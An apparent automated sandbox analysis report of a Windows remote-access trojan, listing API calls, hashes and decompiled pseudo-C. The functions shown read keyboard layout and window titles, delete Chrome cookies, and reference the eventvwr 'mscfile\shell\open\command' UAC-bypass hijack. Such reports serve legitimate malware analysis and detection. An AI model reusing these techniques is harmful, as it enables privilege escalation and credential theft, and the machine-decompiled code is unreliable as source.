                                  • Opcode Fuzzy Hash: e0d2f9db34cf0629cb1e285ec2437386fbdd7813bf54cbf6243c0989171c965f
                                  • Instruction Fuzzy Hash: 7741347290010DEBDB01EBE1ED5EEDE7778EB54345F108136F902A31A1DB745A48CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 28%
                                  			E00402637(void* __ecx, intOrPtr _a4) {
                                  				char _v5;
                                  				struct _SYSTEMTIME _v24;
                                  				char _v40;
                                  				char _v56;
                                  				char* _t42;
                                  				char* _t43;
                                  				char* _t50;
                                  				char* _t51;
                                  				void* _t68;
                                  				void* _t69;
                                  
                                  				_t68 = __ecx;
                                  				if( *((char*)(__ecx + 0x38)) == 0) {
                                  					return 0;
                                  				}
                                  				if( *0x41bcac != 0) {
                                  					if( *((char*)(__ecx + 0x44)) != 0) {
                                  						GetLocalTime( &_v24);
                                  						_t50 =  &_v5;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t50, "KeepAlive Enabled! Timeout: %i seconds\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
                                  						_t51 =  &_v40;
                                  						L00414170();
                                  						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t51, _t50);
                                  						printf(_t51);
                                  						_t69 = _t69 + 0x24;
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						 *(_t68 + 0x44) =  *(_t68 + 0x44) & 0x00000000;
                                  					}
                                  					_t16 = _t68 + 0x3c; // 0x0
                                  					if( *_t16 != _a4) {
                                  						GetLocalTime( &_v24);
                                  						_t42 =  &_v5;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t42, "KeepAlive Timeout changed to %i\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
                                  						_t43 =  &_v56;
                                  						L00414170();
                                  						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t43, _t42);
                                  						printf(_t43);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					}
                                  				}
                                  				 *(_t68 + 0x40) =  *(_t68 + 0x40) & 0x00000000;
                                  				 *((intOrPtr*)(_t68 + 0x3c)) = _a4;
                                  				return 1;
                                  			}


                                  APIs
                                  • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 0040266F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,?,?,?,?,?,?,00000000,0041BE70), ref: 00402699
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 004026A4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 004026AE
                                  • printf.MSVCRT ref: 004026B5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026BD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026C6
                                  • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 004026DC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Timeout changed to %i,?,?,?,?,?,?,00000000,0041BE70), ref: 00402706
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 00402711
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 0040271B
                                  • printf.MSVCRT ref: 00402722
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040272A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402733
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                                  • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds$KeepAlive Timeout changed to %i
                                  • API String ID: 1710008465-2297210016
                                  • Opcode ID: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                  • Instruction ID: 321b724c115d66eaa185a9bbc978540a18db294c5fd1e2a1f117f764d6d2d181
                                  • Opcode Fuzzy Hash: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                  • Instruction Fuzzy Hash: 33313672800608FFCB10DBE4DD49AEEB7BCAF54705F104466F941E3190D7B9AA85CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(override,00000000), ref: 00409D63
                                    • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                    • Part of subcall function 0040B4C8: RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                    • Part of subcall function 0040B4C8: RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409D96
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409DB3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409DC6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 00409DDC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409DE5
                                  • Sleep.KERNEL32(00000BB8), ref: 00409DFA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409E11
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409E2E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409E41
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 00409E57
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409E60
                                  • exit.MSVCRT ref: 00409E77
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@D@1@@V01@@$CloseOpenQuerySleepValueexit
                                  • String ID: 2.7.2 Pro$override$pth_unenc
                                  • API String ID: 3602623569-3893205188
                                  • Opcode ID: a6861308764c8e0be41d382907f78932ef534f6a26338d4c1402dcf431f7bea7
                                  • Instruction ID: 2889bc0b5ca8399aadfd957be20fb2b9bea035d2a19627ad42be5e9aadac3fca
                                  • Opcode Fuzzy Hash: a6861308764c8e0be41d382907f78932ef534f6a26338d4c1402dcf431f7bea7
                                  • Instruction Fuzzy Hash: 2E31B772A50604BBD70477E59C4AEFE776DEF84740F44002AF911971D1DFB8498187AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040313B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403144
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040314E
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403159
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040316A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041BA5C,?), ref: 0040318F
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 004031BF
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 004031CC
                                  • exit.MSVCRT ref: 004031D8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004031E1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004031EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@?length@?$basic_string@$??0?$basic_string@ExecuteG@1@@Shellexit
                                  • String ID: Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                  • API String ID: 2587331422-3923289169
                                  • Opcode ID: a5ebd1b7af4b3a5ca78ff19befb282818f4df8a2bf83191de05e9f26773c89a6
                                  • Instruction ID: 58015f3fb9c85f75900a894e30fbe76f83cf12f03c76df5784ad0d5e993c1cb0
                                  • Opcode Fuzzy Hash: a5ebd1b7af4b3a5ca78ff19befb282818f4df8a2bf83191de05e9f26773c89a6
                                  • Instruction Fuzzy Hash: 25219A72640505FBD700ABA1DD8AEEF772CDB84745F10407AF512B61D0DBB85A4187BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetKeyboardLayoutNameA.USER32(00000000), ref: 0040D9AF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D9BA
                                    • Part of subcall function 00412E83: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412E9D
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012,?,00000000,00000000,?,?,00000000,00000000), ref: 0040D9FC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 0040DA11
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040DA21
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA31
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA3E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA4B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA55
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000012), ref: 0040DA6C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA75
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA81
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA8D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA99
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DAA5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@CreateD@1@@FileG@2@@std@@G@std@@KeyboardLayoutNameV01@@V10@V10@@_itoa
                                  • String ID:
                                  • API String ID: 3751107300-0
                                  • Opcode ID: c2fd4a016dc6b2852169beb4f521ea4233e2add1f1df73e9275396dcc87fe70f
                                  • Instruction ID: 7445f7784f172681db4ab6ed8b3104eac86986a278aabc0f04733adb6ce879a5
                                  • Opcode Fuzzy Hash: c2fd4a016dc6b2852169beb4f521ea4233e2add1f1df73e9275396dcc87fe70f
                                  • Instruction Fuzzy Hash: 39310EB280051DABCB05ABE1EC49EEEBB7CBB54305F04447AF506E3061EF745689CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetWindowTextW.USER32 ref: 0040EAAF
                                  • IsWindowVisible.USER32(?), ref: 0040EAB8
                                  • sprintf.MSVCRT ref: 0040EACF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040EAE6
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,?,004169C4,00000000,004169C8), ref: 0040EB20
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,00000000,004169C8), ref: 0040EB2D
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00000000,004169C8), ref: 0040EB3A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB47
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB57
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB65
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB71
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB7A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB83
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB8C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB95
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB9E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBA7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBB0
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$G@2@@std@@G@std@@V10@$??0?$basic_string@$D@1@@Window$?c_str@?$basic_string@?length@?$basic_string@G@1@@TextV01@V01@@V10@0@VisibleY?$basic_string@_itoasprintf
                                  • String ID:
                                  • API String ID: 1480451481-0
                                  • Opcode ID: 88f6ae1521f24779943ca0962c0ad8f5bdb5bca5a5571728218eacb22bb029de
                                  • Instruction ID: 896110e7d44d4e8721ff4af176c5386cc18dfd6a0cdb0307768c484521d74486
                                  • Opcode Fuzzy Hash: 88f6ae1521f24779943ca0962c0ad8f5bdb5bca5a5571728218eacb22bb029de
                                  • Instruction Fuzzy Hash: 0031BEB2C0060DEBDB05ABE0EC49DDE7B7CAB54305F108026F526E6061EB759699CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D665
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D68C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D69F
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D6BA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D6C3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D6D9
                                    • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                    • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                    • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D6F3
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001), ref: 0040D704
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D711
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D734
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D74B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@2@@std@@G@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V01@@V?$basic_string@$??2@??3@?length@?$basic_string@?size@?$basic_string@ExecuteShell
                                  • String ID: open
                                  • API String ID: 2112629403-2758837156
                                  • Opcode ID: 50475a9cfbc78c3b4d15a830515efdd2aa11e385f63a67c81f68d873a2421c2f
                                  • Instruction ID: 3c6387fd113382c931602557de23b741b53e110e960cdbc023917b4df3b65b40
                                  • Opcode Fuzzy Hash: 50475a9cfbc78c3b4d15a830515efdd2aa11e385f63a67c81f68d873a2421c2f
                                  • Instruction Fuzzy Hash: 94317C72910519EBCB04BBE1EC999FE7778AF54356B40487EF412A30E1EE785A04CB28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 32%
                                  			E004071CF() {
                                  				char _v5;
                                  				char _v6;
                                  				char _v24;
                                  				void* _v40;
                                  				char* _t12;
                                  				CHAR* _t13;
                                  				long _t20;
                                  				char* _t21;
                                  				void* _t25;
                                  
                                  				_t12 = getenv("UserProfile");
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
                                  				_t13 =  &_v24;
                                  				L00414170();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				if(DeleteFileA(_t13) != 0) {
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
                                  					E00407A90("\n[Chrome Cookies found, cleared!]");
                                  					_t25 = 1;
                                  					L8:
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					return _t25;
                                  				}
                                  				_t20 = GetLastError();
                                  				if(_t20 == 0) {
                                  					_t21 =  &_v6;
                                  					L5:
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
                                  					E00407A90("\n[Chrome Cookies not found]");
